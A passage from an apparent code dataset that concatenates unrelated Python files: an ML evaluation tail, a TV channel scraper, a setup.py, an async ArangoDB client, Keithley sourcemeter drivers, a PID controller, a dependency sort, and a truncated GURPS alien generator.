model_adapt=model_from_json(loadedModel_adapt)
model_adapt.load_weights(weightsSave)
else:
print("Error: model_adapt and weights_adapt not loaded")
sys.exit(1)
predictions_adapt = model_adapt.predict(x_test)
#replace predictions and Y_test in results file
history_adapt = pickle.load(open(resultsFile, "rb"))
tmp = []
for gr in test_info["gr"]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history_adapt["Y_test"] = np.array(tmp)
history_adapt['predictions'] = np.array(predictions_adapt)
test_acc_adapt(y_test, predictions_adapt)
# rewrite new results file
newResultsFile = resultsFile.replace(".p","_params%s.p"%(paramsID))
print("new results written to: ", newResultsFile)
pickle.dump(history_adapt, open(newResultsFile, "wb"))
# Plot results
plotResultsSoftmax2HeatmapMis(resultsFile=newResultsFile.replace("_adapt_%s_params%s.p"%(nthIter,paramsID),"_adapt_1_params%s.p"%(paramsID)),
resultsFile2=newResultsFile,
saveas=newResultsFile.replace(".p",".pdf"),
admixture=admixture)
######### write log ###########
outLog = resultsFile.replace("_adapt_%s.p"%(nthIter),"_log_params%s.txt"%(paramsID))
with open(outLog, "w") as fOUT:
fOUT.write("Before adaptive training\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_params2 examples (%): {:.3f}\n'.format(test_acc_clean.result() * 100))
fOUT.write("\nAfter adaptive training (%s iterations of improvement)\n"%(nthIter-1))
fOUT.write("===========================\n")
fOUT.write('test acc on test_params2 examples (%): {:.3f}\n'.format(test_acc_adapt.result() * 100))
return None
``` |
{
"source": "jradwan/alexa_tivo_control",
"score": 3
} |
#### File: alexa_tivo_control/channelGenerators/generateUKTivoChannels.py
```python
import requests
from bs4 import BeautifulSoup
firstline = True
def printData(section, genre):
global firstline
for row in section:
if len(row.find_all("th")) < 1:
# Only process rows that are not header rows
channelNumber = row.contents[1].get_text()
channelName = row.contents[3].get_text()
if not firstline:
print(",")
print(" {{ \"name\":\"{}\", \"alias\":\"{}\", \"channel\":{}, \"pronounce\":\"{}\", \"genre\":\"{}\" }}".format(channelName, channelName, channelNumber, channelName, genre),end='')
firstline = False
cont = requests.get('https://www.tvchannellists.com/List_of_channels_on_Virgin_Media_(UK)').content
tvdata = BeautifulSoup(cont, "lxml")
print("[")
printData(tvdata.find(id="Entertainment").parent.next_sibling.next_sibling.find_all('tr'), "Entertainment")
printData(tvdata.find(id="Factual").parent.next_sibling.next_sibling.find_all('tr'), "Factual")
printData(tvdata.find(id="Lifestyle").parent.next_sibling.next_sibling.find_all('tr'), "Lifestyle")
printData(tvdata.find(id="Music").parent.next_sibling.next_sibling.find_all('tr'), "Music")
printData(tvdata.find(id="Movies").parent.next_sibling.next_sibling.find_all('tr'), "Movies")
printData(tvdata.find(id="Sport").parent.next_sibling.next_sibling.find_all('tr'), "Sport")
printData(tvdata.find(id="News").parent.next_sibling.next_sibling.find_all('tr'), "News")
printData(tvdata.find(id="Kids").parent.next_sibling.next_sibling.find_all('tr'), "Kids")
printData(tvdata.find(id="Shopping").parent.next_sibling.next_sibling.find_all('tr'), "Shopping")
printData(tvdata.find(id="International").parent.next_sibling.next_sibling.find_all('tr'), "International")
print("\n]")
``` |
{
"source": "jraedler/DyMat",
"score": 2
} |
#### File: jraedler/DyMat/setup.py
```python
import os
from distutils.core import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "DyMat",
version = "0.7",
author = "<NAME>",
author_email = "<EMAIL>",
description = ("a package for reading and processing the result files of Dymola and OpenModelica"),
license = "BSD",
keywords = "modelica dymola openmodelica mat",
url = "http://www.j-raedler.de/projects/DyMat/",
download_url = "https://github.com/jraedler/DyMat/",
packages = ['DyMat', 'DyMat.Export'],
scripts = ['scripts/DyMatExport.py'],
long_description = read('README.txt'),
classifiers = [
"Development Status :: 4 - Beta",
"Environment :: Console",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python :: 3",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering",
"Topic :: Utilities"
],
)
``` |
{
"source": "JRafiei/pyarango-async",
"score": 3
} |
#### File: pyarango-async/pyarango_async/arango_async.py
```python
import aiohttp
import asyncio
import async_timeout
class ArangoClient(object):
def __init__(self, host='127.0.0.1', port=8529, dbname='', username='root', password=''):
self.max_retry = 1
self.timeout = 3
self.host = host
self.port = port
self.dbname = dbname
self.username = username
self.password = password
self.token = None
self.base_url = f"http://{self.host}:{self.port}"
async def get_token(self, session):
params = {"username": self.username, "password": self.password}
endpoint = f"{self.base_url}/_open/auth"
with async_timeout.timeout(self.timeout):
try:
async with session.post(endpoint, json=params) as response:
res = await response.json()
self.token = res['jwt']
except (aiohttp.ClientConnectionError, asyncio.CancelledError) as e:
return None
async def execute(self, query):
async with aiohttp.ClientSession() as session:
params = { "query" : query }
endpoint = f"{self.base_url}/_db/{self.dbname}/_api/cursor"
retry = 0
while retry <= self.max_retry:
headers = {"Authorization": f"bearer {self.token}"}
with async_timeout.timeout(self.timeout):
try:
async with session.post(endpoint, json=params, headers=headers) as response:
res = await response.json()
except (aiohttp.ClientConnectionError, asyncio.CancelledError) as e:
return None
if res['code'] == 401:
if retry == self.max_retry:
return None
else:
await self.get_token(session)
elif res['code'] >= 400:
return None
else:
result = res['result']
return result
retry += 1
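# --- Usage sketch (not part of the original module) ---------------------------
# Assumes a reachable ArangoDB instance with the database and credentials shown
# below; adjust them to your own setup. The AQL query is illustrative only.
if __name__ == '__main__':
    async def main():
        client = ArangoClient(host='127.0.0.1', port=8529, dbname='_system',
                              username='root', password='')
        result = await client.execute('RETURN 1 + 1')
        print(result)  # -> [2] on success, None on error or timeout
    asyncio.run(main())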
``` |
{
"source": "jrafolsr/pyInstruments",
"score": 2
} |
#### File: pyInstruments/instruments/keithley24XX.py
```python
from ..resources import sourcemeter
from numpy import array, linspace
class keithley24XX(sourcemeter):
def __init__(self, resource, termination = '\r'):
sourcemeter.__init__(self,resource, termination = termination)
if (self.identify[0:34] == "KEITHLEY INSTRUMENTS INC.,MODEL 24"):
print('You have connected succesfully with a %s' % self.identify[0:36])
else:
raise Exception('Not able to connect with a 24XX family sourcemeter')
def mode_pulse(self,curr_list,tpulse,term = 'FRONT'):
"""This method implements a pulse generated from the current list from the first argument
with a time length of tpulse"""
n_curr = len(curr_list)
cmdcurr = ":SOUR:LIST:CURR "
for i, curr in enumerate(curr_list):
if i < n_curr -1:
cmdcurr = cmdcurr + "{:.6f},".format(curr)
else:
cmdcurr = cmdcurr + "{:.6f}".format(curr)
self.inst.write("*RST") # Reset instrument to default parameters.
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SENS:FUNC:OFF:ALL")
self.inst.write(":SOUR:FUNC:MODE CURR") # Select current source function.
self.inst.write(":SOUR:CURR:MODE LIST") # Set mode list, an strategy to do a pulse
self.inst.write(cmdcurr) # The command to input the list
self.inst.write(":SOUR:DEL %.6e" % (tpulse))
#inst.write(":SOUR:CURR 0.00") # Set source to output 10mA.
self.inst.write(":SOUR:CLE:AUTO ON") # Enable source auto output-off.
#inst.write(":SENS:VOLT:PROT 10") # Set 10V compliance limit.
self.inst.write(":TRIG:COUN {:d}".format(n_curr)) # Set to perform one measurement.
def mode_ifix_configure(self,term = 'FRONT', fw = True, cmpl = 21.0, aver = True,\
Ncount = 10, beeper = True, nplc = 1, sens = True,\
curr_range = None):
"""Configures the 2400 to deliver a fix intensity and measure the voltage drop.
Optional arguments:
- term = 'FRONT': The default terminal is FRONT. REAR can also be passed.
- fw = True: 4-wire measurement or 2-wire
- compl = 10: Set the compliance in volts, default is 10 V.
- aver = True: Enables the average filter. Default is true.
- Ncount = 10: Number of samples to average in case filter is enabled.
- beeper = True: Enables or disables the beeper
- nplc = 1: Light cycles
HAVE FUN! """
self.inst.write("*RST") # Reset instrument to default parameters.
self.inst.write(":SYSTem:TIME:RESet") # Reset the time of the sourcemeter
self.inst.write(":SYST:BEEP:STAT %i" % beeper) # Turn on/off the beeper
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SENS:RES:MODE MAN") # Select manual ohms mode.
self.inst.write(":SYST:RSEN %i" % fw) # Select four wire measuremnt ohms mode.
self.inst.write(":SOUR:FUNC CURR") # Select current source function.
self.inst.write(":SOUR:CURR 0.00") # Set source to output 10mA.
self.inst.write(":SOUR:CLE:AUTO OFF") # Enable source auto output-off.
if curr_range is not None:
self.inst.write(":SOUR:CURR:RANG {:.6e}".format(curr_range))
self.inst.write(":SENS:VOLT:PROT %.2f" % cmpl) # Set 10V compliance limit.
self.inst.write(":TRIG:COUN 1") # Set to perform one measurement.
self.inst.write(":SENS:AVER:TCON REP") # Set filter to repeating average
self.inst.write(":SENS:AVER:COUNT %i" % Ncount) # Set filter to repeating to 10 measurements
self.inst.write(":SENS:AVER:STATE %i" % aver) # Enable fiLter
self.inst.write(':SENS:FUNC "VOLT"') # Select ohms measurement function.
# self.inst.write(':SENS:FUNC:ON "VOLT","CURR"')
self.inst.write(":SENS:VOLT:NPLC %.3f" % nplc) # Set measurement speed to 1 PLC.
self.inst.write(":SENS:VOLT:RANG:AUTO ON") # Auto range ON
self.inst.write(":SYST:AZER:STAT ON") # Auto-zero on
# self.inst.write(":SYST:AZER:CACH:STAT ON")
if not sens:
print('All sens function have been turned off')
self.inst.write("SENS:FUNC:OFF:ALL")
def mode_ifix_setcurr(self,curr, curr_max = 0.05, curr_min = -0.05):
""" Sends the order to the sourcemeter to inject the current 'curr' in A.
Option arguments:
- curr_max = 0.1: sets the maximum limit to be injected, to protect the
device.
- curr_min = 0.00: sets the minimum injected current, to polarize a device.
"""
# Set the current value in A
if curr_min < curr < curr_max:
self.inst.write(":SOUR:CURR %.6f" % curr)
elif curr > curr_max:
self.inst.write(":SOUR:CURR %.6f" % curr_max)
print('WARNING: You have reached a software high current limit. Change it with curr_max argument')
else:
self.inst.write(":SOUR:CURR %.6f" % curr_min)
print('WARNING: You have reached a software low current limit. Change it with curr_min argument')
def mode_ifix_read(self):
"""Deprecated"""
print('This method is deprecated, use de read() method instead. Does the same')
return self.inst.query_ascii_values('READ?', container=array)
def read(self):
""" Sends the query read, and returns an array, depending on the type of measurement implemented"""
return self.inst.query_ascii_values('READ?', container=array)
def init(self):
#inst.write(":TRIG:DEL %.6f" % (trigger_del/1000.0))
self.inst.write("INIT")
def mode_vfix_configure(self,term = 'FRONT', fw = False, cmpl = 0.05, beeper = True, aver = True,\
Ncount = 10, nplc = 1, sens = True,\
volt_range = None):
"""Configures the 2400 to deliver a fix voltage and that's it for the moment"
Optional arguments:
- term = 'FRONT': The default terminal is FRONT. REAR can also be passed.
- compl = 10: Set the compliance in volts, default is 10 V.
- beeper = True: Enables or disables the beeper
HAVE FUN! """
self.inst.write("*RST") # Reset instrument to default parameters.
self.inst.write(":SYSTem:TIME:RESet") # Reset the time of the sourcemeter
self.inst.write(":SYST:BEEP:STAT %i" % beeper) # Turn on/off the beeper
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SYST:RSEN %i" % fw) # Select four wire measuremnt ohms mode.
self.inst.write(":SOUR:FUNC VOLT") # Select current source function.
self.inst.write(":SOUR:VOLT 0.00") # Set source to output 0.0V.
self.inst.write(":SOUR:CLE:AUTO OFF") # Enable source auto output-off.
if volt_range is not None:
self.inst.write(":SOUR:VOLT:RANG {:.6e}".format(volt_range))
self.inst.write(":TRIG:COUN 1") # Set to perform one measurement.
self.inst.write(":SENS:AVER:TCON REP") # Set filter to repeating average
self.inst.write(":SENS:AVER:COUNT %i" % Ncount) # Set filter to repeating to 10 measurements
self.inst.write(":SENS:AVER:STATE %i" % aver) # Enable fiLter
self.inst.write(":SENS:VOLT:NPLC %.3f" % nplc) # Set measurement speed to 1 PLC.
self.inst.write(":SENS:VOLT:RANG:AUTO ON") # Auto range ON
self.inst.write(":SENS:CURR:PROT:LEV %.3g" % cmpl) # Set the compliance limit.
if not sens:
print('All sens function have been turned off')
self.inst.write(":SENS:FUNC:OFF:ALL")
def mode_vfix_setvolt(self,volt):
""" Sends the order to the sourcemeter to set the voltage 'volt' in V."""
self.inst.write(":SOUR:VOLT %.6f" % volt)
def outpoff(self):
self.inst.write(":OUTP OFF")
def outpon(self):
self.inst.write(":OUTP ON")
def outpstate(self):
"""Checks the output state"""
return bool(self.inst.query_ascii_values(":OUTPut?")[0])
def close(self):
self.inst.close()
def check_volt_compliance(self):
return bool(self.inst.query_ascii_values(':VOLTage:PROTection:TRIPped?')[0])
def check_curr_compliance(self):
return bool(self.inst.query_ascii_values(':CURRent:PROTection:TRIPped?')[0])
def mode_Vsweep_config(self,start, stop, step = 0.1, mode = 'step', sweep_list = [], term = 'FRONT', cmpl = 0.1, delay = 0.1, ranging = 'AUTO', nplc = 1, spacing = 'LIN'):
"""
Configures the Keithley to perform a voltage sweep
Parameters:
----------
start: int or float
Initial voltage in V in the case of a stair-like sweep.
stop: int or float
Final voltage in V in the case of a stair-like sweep.
step: int or float
Voltage step in V in the case of a stair-like sweep.
mode: 'step' or 'list'
Sweep mode. If 'step', the values start, stop, step and spacing are used to configure the sweep-list values. If 'list', the list passed to the 'sweep_list' argument is used. The default is 'step'.
term: 'FRONT' or 'REAR'
The output terminal to use. The default is 'FRONT'.
cmpl: int or float
The current compliance value in A.
nplc: int or float, 0.01 <= nplc <= 100
Integration time in number of power line cycles. The default is 1.
ranging: 'AUTO' or float
Sets the current sensing range to a fixed value when a number is passed. The default is 'AUTO', in which case the sourcemeter adjusts the range according to the measured values.
spacing: 'LIN' or 'LOG'
Spacing type of the values in the case of a stair-like sweep.
delay: int or float or 'AUTO'
Delay in seconds between the settled source value and the measurement reading. If 'AUTO', the instrument's source auto-delay is used.
"""
print("INFO: Keithley configured in sweep mode")
self.inst.write("*RST") # Reset instrument to default parameters.
# self.inst.write("*CLS")
# self.inst.write("*OPC")
# self.inst.write("*SRE 1")
self.inst.write(":SYSTem:TIME:RESet") # Reset the time of the sourcemeter
self.inst.write(":SYST:BEEP:STAT 1") # Turn on/off the beeper
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SOUR:CLE:AUTO ON") # Enable source auto output-off.
self.inst.write(":SOUR:FUNC VOLT")
Npoints = int((stop - start) / step) + 1
if mode == 'step':
self.inst.write(":SOURce:VOLTage:MODE SWEep")
self.inst.write(":SOURce:SwEep:SPACing %s" % spacing)
self.inst.write(":SOURce:VOLTage:STARt %.6f" % start)
self.inst.write(":SOURce:VOLTage:STOP %.6f" % stop)
self.inst.write(":SOURce:VOLTage:STEP %.6f" % step)
self.inst.write(":TRIG:COUN %d" % Npoints) # Set to perform N measurements.
elif mode == 'list':
self.inst.write(":SOURce:VOLTage:MODE LIST")
Npoints = len(sweep_list)
t = ''
for value in sweep_list:
t += f'{value:.4f},'
t = t[0:-1]
self.inst.write(":SOURce:LIST:VOLTage %s" % t)
self.inst.write(":TRIG:COUN %d" % Npoints)
if (delay == 'AUTO') | (delay == 'auto'):
self.inst.write(":SOURce:DELay:AUTO ON")
self.sweep_total_time = (0.005 + nplc /50 + 0.05) * Npoints
else:
self.inst.write(":SOURce:DELay %.6f" % delay)
self.sweep_total_time = (delay + nplc /50 + 0.05) * Npoints
self.inst.write(":SOURce:SwEep:RANging BEST")
self.inst.write(":SENSe:FUNC 'CURR:DC'")
self.inst.write(":SENSe:CURR:NPLC %.3f" % nplc) # Set measurement speed to 1 PLC.
self.inst.write(":SENSe:CURR:PROT:LEV %.3g" % cmpl)
if (ranging != 'AUTO') & (ranging != 'auto'):
if ranging >= cmpl:
print('INFO: The compliance is increased to match the SENSe range')
self.inst.write(":SENSe:CURR:PROT:LEV %.3g" % ranging)
self.inst.write(":SENSe:CURRent:RANGe %.6e" % ranging)
def sweep_read(self, delay = None):
"""
Launches the configured sweep using the method mode_Isweep_config.
Parameters:
----------
delay: int or float
Delay time in seconds between the write and read of the query; the default is taken from the estimated time to perform the sweep, stored in the property self.sweep_total_time.
Returns:
--------
data: np.array
Array containing the output from the sourcemeter, N x 5, where N is the number of points taken. The first two columns are the voltage and current, respectively.
"""
self.outpon()
if delay == None:
delay = self.sweep_total_time
data = self.inst.query_ascii_values("READ?", delay = delay, container = array)
# Reshaping the data to a Npoints x columns array
data = data.reshape((data.shape[0] // 5, 5))
return data
```
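A minimal usage sketch for the class above (not from the original repository): the GPIB resource string is a placeholder assumption, and the import path follows the package layout used by the other files in this repo.
```python
from pyInstruments.instruments import keithley24XX

smu = keithley24XX('GPIB0::24::INSTR')  # placeholder VISA address
smu.mode_ifix_configure(term='FRONT', fw=True, cmpl=10.0, nplc=1)
smu.mode_ifix_setcurr(0.001)            # source 1 mA
smu.outpon()
print(smu.read())                       # measurement array returned by READ?
smu.outpoff()
smu.close()
```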
#### File: pyInstruments/ivsweep/tasks.py
```python
import numpy as np
from pyInstruments.instruments import keithley24XX # This the module I created
import datetime
from pathlib import Path
class IVSweeperTask(object):
def __init__(self, resource = None, folder = '.\\', filename = 'voltage-sweep',\
start = 0, stop = 1, step = 0.1, mode = 'step', sweep_list = [],\
term = 'FRONT', cmpl = 0.1, delay = 0.1, ranging = 'AUTO', nplc = 1, spacing = 'LIN'):
"""
Parameters
----------
resource : str, optional
The VISA resource name of the Keithley24XX sourcemeter. The default is None, in which case it must be set through the resource attribute before calling start_instrument().
folder : str, optional
Folder where to save the data, absolute or relative. The default is '.\'.
filename : str, optional
Filename where to save the data. Always appends if the file already exists. The default is 'voltage-sweep'.
start: int or float
Initial voltage in V in the case of a stair-like sweep.
stop: int or float
Final voltage in V in the case of a stair-like sweep.
step: int or float
Voltage step in V in the case of a stair-like sweep.
mode: 'step' or 'list'
Sweep mode. If 'step', the values start, stop, step and spacing are used to configure the sweep-list values. If 'list', the list passed to the 'sweep_list' argument is used. The default is 'step'.
term: 'FRONT' or 'REAR'
The output terminal to use. The default is 'FRONT'.
cmpl: int or float
The current compliance value in A.
nplc: int or float, 0.01 <= nplc <= 100
Integration time in number of power line cycles. The default is 1.
ranging: 'AUTO' or float
Sets the current sensing range to a fixed value when a number is passed. The default is 'AUTO', in which case the sourcemeter adjusts the range according to the measured values.
spacing: 'LIN' or 'LOG'
Spacing type of the values in the case of a stair-like sweep.
delay: int or float
Delay in seconds between the settled source value and the measurement reading.
Returns
-------
None.
"""
self.max_length = 500
self.time = []
self.voltage = []
self.intensity = []
self.resource = resource
self.folder = Path(folder)
self.filename = filename
self.configuration = dict(start = start, stop = stop, step = step, mode = mode, sweep_list = sweep_list,\
term = term, cmpl = cmpl, delay = delay, ranging = ranging, nplc = nplc, spacing = spacing)
self.data_ready = False
def start_instrument(self):
"""
Powers on the instrument.
"""
# Opening the resource only done if not done before
if self.resource is None:
raise ValueError('The sourcemeter resource has not been defined. Please define it throught the resource attribute')
self.keithley = keithley24XX(self.resource)
self.keithley.mode_Vsweep_config(**self.configuration)
def run(self):
"""
Engages the sweep.
"""
############ LOGGING THE DATA ###################################
# Opening the file to save the data
filename = Path(self.folder) / (self.filename + '.txt')
if not filename.exists():
with open(filename,'a') as f:
f.write(('# ' + 3*'{:^12}\t' + '\n').format('Voltage(V)','Current(A)', 'Time(s)'))
timestamp = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f")
data = self.keithley.sweep_read()
with open(filename,'a') as f:
f.write('# {}\n'.format(timestamp))
f.write('# Delay between steps: {}\n'.format(self.configuration['delay']))
np.savetxt(f, data[:,[0,1,3]], fmt = '%.6f')
self.voltage = data[:,0]
self.intensity = data[:,1]
self.time = data[:,3]
self.data_ready = True
```
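A hedged usage sketch of the task above; the resource string and the sweep limits are illustrative assumptions, and the import path follows the file layout of this repository.
```python
from pyInstruments.ivsweep.tasks import IVSweeperTask

task = IVSweeperTask(resource='GPIB0::24::INSTR',   # placeholder VISA address
                     folder='.', filename='voltage-sweep',
                     start=0.0, stop=2.0, step=0.1, cmpl=0.05, delay=0.1)
task.start_instrument()              # configures the Keithley for the sweep
task.run()                           # runs the sweep and appends the data to the file
print(task.voltage, task.intensity)  # arrays filled once data_ready is True
```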
#### File: pyInstruments/pid/pid_class.py
```python
from time import time
class Pid(object):
def __init__(self, Kp, Ki, Kd, ulimit = 0.020, llimit = 3.5e-5):
"""Initalize all values for the PID"""
# Values of the pid
self.Kp = Kp
self.Ki = Ki
self.Kd = Kd
self.ti = 0.0
self.td = 0.0
self.dt = 0.0
# Check for the first call
self.first_call = True
# Setpoint and value
self.setpoint = 0.0
self.value = 0.0
# Limits of the action provided by the user
self.set_ulimit(ulimit)
self.set_llimit(llimit)
def set_ulimit(self, limit):
"""This method sets the maximum value of the action of PID"""
self.ulimit = limit
print("The action maximum value will be limited to {:.2g}".format(self.ulimit))
def set_llimit(self, limit):
"""This method sets the minimum value of the action of PID"""
self.llimit = limit
print("The action minimum value will be limited to {:.2g}".format(self.llimit))
def set_setpoint(self,setpoint):
"""This method sets the setpoint value of the PID"""
self.setpoint = setpoint
def update(self, value, setpoint = None):
"""This function updates the value of the action. It needs the reference current value of the control\
variable. It No setpoint is provided, the setpoint is taken from the attribute self.setpoint"""
if setpoint is not None:
self.setpoint = setpoint
if self.first_call:
self.prev_time = time()
self.first_call = False
# Update all the values
self.dt = time() - self.prev_time
self.value = value
error = self.setpoint - self.value
pi = self.Kp * error
ti = self.Ki * error * self.dt
if self.dt > 0:
td = self.Kd * error / self.dt
else:
td = 0
action = pi + (self.ti + ti) + td - self.td
if self.llimit < action < self.ulimit:
self.ti = self.ti + ti
self.td = td -self.td
elif action > self.ulimit:
action = self.ulimit
else:
action = self.llimit
self.prev_time = time()
return action
def clear(self):
"""Clears and resets the PID to the initial values of the integrative and derivative factors"""
self.ti = 0.0
self.td = 0.0
self.dt = 0.0
self.first_call = True
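# --- Usage sketch (not part of the original module) ---------------------------
# A bare control-loop skeleton; the gains, setpoint and the constant sensor
# reading below are illustrative placeholders for a real read/actuate pair.
if __name__ == '__main__':
    from time import sleep
    pid = Pid(Kp=1e-3, Ki=5e-4, Kd=0.0, ulimit=0.020, llimit=3.5e-5)
    pid.set_setpoint(25.0)
    for _ in range(10):
        measured = 20.0                           # replace with a real sensor reading
        action = pid.update(measured)             # clipped to [llimit, ulimit]
        print('action = {:.3e}'.format(action))   # replace with a real actuator write
        sleep(0.1)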
``` |
{
"source": "j-raghavan/Dfs",
"score": 4
} |
#### File: j-raghavan/Dfs/dfs.py
```python
from collections import defaultdict
def sort_dependencies(dependencies):
result = []
visited = set([])
visiting = set([])
def dfs(node):
if node in visited:
return
visiting.add(node)
for neighbor in dependencies[node]:
if neighbor in visiting:
raise Exception('Cycle Dependency Found')
if neighbor not in visited:
dfs(neighbor)
visiting.remove(node)
visited.add(node)
result.append(node)
for node in dependencies.keys():
dfs(node)
print(result)
if __name__ == '__main__':
depDict = {
0: [],
1: [0],
2: [0],
3: [1,2],
4: [3],
5: [1,2],
6: [5],
7: [3,4,5,6],
8: [12],
9: [0,3],
10: [2],
11: [10],
12: [10,11]
}
sort_dependencies(depDict)
``` |
{
"source": "JRahilly/GURPS_Scripts",
"score": 3
} |
#### File: JRahilly/GURPS_Scripts/Alien.py
```python
import Functions as F
import os
# *** Classes *** #
class Alien(): # Defines a new alien species
# *** Global Class Vars *** #
alienNum = 1
# *** Class Functions *** #
def __init__(self):
# *** Self Attributes *** #
self.name = 'SID#{}'.format(Alien.alienNum)
self.chemicalBasis = Alien.chemicalBasis(self)
self.dwelling, self.habitat = Alien.habitat(self)
self.sapience = Alien.sapience(self)
self.trophicLevel = Alien.trophicLevel(self, 0)
self.primaryLocomotion, self.secondaryLocomotion, self.tertiaryLocomotion = Alien.locomotion(self)
self.sizeClass, self.size, self.weight, self.sizeMod, self.strength, self.gravity = Alien.size(self)
# self.symmetry, self.limbs, self.tails, self.manipulators, self.skeleton = Alien.body(self)
# *** Class Var Increments *** #
Alien.alienNum += 1
def attributes(self):
print(self.name)
print('---- Biology ----')
print('Chemical Basis : {}'.format(self.chemicalBasis))
print('Dwelling : {}'.format(self.dwelling))
print('Habitat : {}'.format(self.habitat))
print('Sapience : {}'.format(self.sapience))
print('Trophic Level : {}'.format(self.trophicLevel))
print('---- Locomotion ----')
print('Primary Locomotion : {}'.format(self.primaryLocomotion))
if self.secondaryLocomotion != None:
print('Secondary Locomotion : {}'.format(self.secondaryLocomotion))
if self.tertiaryLocomotion != None:
print('Tertiary Locomotion : {}'.format(self.tertiaryLocomotion))
print('---- Size ----')
print('Size Class : {}'.format(self.sizeClass))
print('Longest Dimension : {}'.format(self.size))
print('Average Earth Weight : {}'.format(self.weight))
print('Native Gravity : {}'.format(self.gravity))
print('Average Native Weight: {:.2f}'.format(self.weight * self.gravity))
print('Size Modifier : {}'.format(self.sizeMod))
print('Average Strength : {}'.format(self.strength))
# print('---- Body ----')
# print('Body Symmetry : {}'.format(self.symmetry))
# print('Limb Count : {}'.format(self.limbs))
# print('Tail Count : {}'.format(self.tails))
# print('Manipulator Count : {}'.format(self.manipulators))
# print('Skeleton Type : {}'.format(self.skeleton))
def body(self):
# *** Tables *** #
table = {
'Symmetry' : {
2 : 'Bilateral',
3 : 'Bilateral',
4 : 'Bilateral',
5 : 'Bilateral',
6 : 'Bilateral',
7 : 'Bilateral',
8 : 'Trilateral',
9 : 'Radial',
10 : 'Spherical',
11 : 'Asymmetric',
12 : 'Asymmetric',
13 : 'Asymmetric',
14 : 'Asymmetric'},
'Limbs' : {
1 : 'Limbless',
2 : 'One Segment (One Limb per Side)',
3 : 'Two Segments (Two Limbs per Side)',
4 : 'Segments (Each Segment has One Limb per Side)',
5 : 'Segments (Each Segment has One Limb per Side)',
6 : 'Segments (Each Segment has One Limb per Side)'},
'Tails' : {
2 : 'No Features',
3 : 'No Features',
4 : 'No Features',
5 : 'No Features',
6 : 'Striker Tail',
7 : 'Long Tail',
8 : 'Constricting Tail',
9 : 'Barbed Striker Tail',
10 : 'Gripping Tail',
11 : 'Branching Tail',
12 : 'Combination'},
'Manipulators' : {
6 : 'No Manipulators',
7 : '1 Set of Manipulators with Bad Grip',
8 : 'Prehensile Tail of Trunk',
9 : '1 Set of Manipulators with Normal DX',
10 : '2 Sets of Manipulators',
11 : 'Sets of Manipulators',
12 : 'Sets of Manipulators',
13 : 'Sets of Manipulators',
14 : 'Sets of Manipulators',
15 : 'Sets of Manipulators',
16 : 'Sets of Manipulators',
17 : 'Sets of Manipulators'},
'Skeleton' : {
3 : 'No Skeleton',
4 : 'Hydrostatic Skeleton',
5 : 'Hydrostatic Skeleton',
6 : 'External Skeleton',
7 : 'External Skeleton',
8 : 'Internal Skeleton',
9 : 'Internal Skeleton',
10 : 'Internal Skeleton',
11 : 'Combination',
12 : 'Combination',
13 : 'Combination',
14 : 'Combination',
15 : 'Combination',
16 : 'Combination'},
'Spherical' : {
1 : '4 Sides',
2 : '6 Sides',
3 : '6 Sides',
4 : '8 Sides',
5 : '12 Sides',
6 : '20 Sides'}}
# *** Dice Roller *** #
rollA = F.rollDice(6, 2)
rollB = F.rollDice(6, 1)
rollC = F.rollDice(6, 1)
rollD = F.rollDice(6, 2)
rollE = F.rollDice(6, 2)
rollF = F.rollDice(6, 2)
# *** Symmetry *** #
if self.habitat == 'Space-Dwelling' or self.primaryLocomotion == 'Immobile':
rollA += 1
symmetry = table['Symmetry'][rollA]
else:
symmetry = table['Symmetry'][rollA]
if symmetry == 'Radial':
symmetry += ' {} Sides'.format(F.rollDice(6, 1) + 3)
rollC -= 2
elif symmetry == 'Spherical':
symmetry += ' {}'.format(table['Spherical'][rollB])
elif symmetry == 'Trilateral':
rollC -= 1
# *** Limbs *** #
def chemicalBasis(self):
# *** Table **** #
table = {
3 : 'Hydrogen-Based Life',
4 : 'Hydrogen-Based Life',
5 : 'Hydrogen-Based Life',
6 : 'Ammonia-Based Life',
7 : 'Ammonia-Based Life',
8 : 'Hydrocarbon-Based Life',
9 : 'Water-Based Life',
10 : 'Water-Based Life',
11 : 'Water-Based Life',
12 : 'Chlorine-Based Life',
13 : 'Silicon/Sulfuric Acid Life',
14 : 'Silicon/Liquid Sulfur Life',
15 : 'Silicon/Liquid Rock Life',
16 : 'Plasma Life',
17 : 'Exotica',
18 : 'Exotica'}
# *** Dice Roller *** #
rollA = F.rollDice(6, 3)
rollB = F.rollDice(6, 1)
chemicalBasis = table[rollA]
# *** Edge Case *** #
if chemicalBasis == 'Exotica':
if rollB == 1:
chemicalBasis = 'Nebula-Dwelling Life'
elif rollB == 6:
chemicalBasis = 'Magnetic Life'
else:
chemicalBasis = 'Machine Life'
return chemicalBasis
def habitat(self):
# *** Tables *** #
landHab = {
3 : 'Plains',
4 : 'Plains',
5 : 'Plains',
6 : 'Plains',
7 : 'Plains',
8 : 'Desert',
9 : 'Island/Beach',
10 : 'Woodlands',
11 : 'Swampland',
12 : 'Mountain',
13 : 'Artic',
14 : 'Jungle',
15 : 'Jungle',
16 : 'Jungle',
17 : 'Jungle',
18 : 'Jungle'}
waterHab = {
3 : 'Banks',
4 : 'Banks',
5 : 'Banks',
6 : 'Banks',
7 : 'Banks',
8 : 'Open Ocean',
9 : 'Fresh-Water Lake',
10 : 'River/Stream',
11 : 'Tropical Lagoon',
12 : 'Deep-Ocean Vents',
13 : 'Salt-Water Sea',
14 : 'Reef',
15 : 'Reef',
16 : 'Reef',
17 : 'Reef',
18 : 'Reef'}
# *** Dice Roller *** #
rollA = F.rollDice(6, 1)
rollB = F.rollDice(6, 1)
rollC = F.rollDice(6, 3)
# *** Planetary or Space Based *** #
dwelling = ''
habitat = ''
if self.chemicalBasis == 'Nebula-Dwelling Life':
dwelling = 'Nebula'
habitat = 'Space-Dwelling'
elif rollA >= 5:
dwelling = 'Gas Giant'
habitat = waterHab[rollC]
else:
if rollB <= 3:
dwelling = 'Land'
habitat = landHab[rollC]
else:
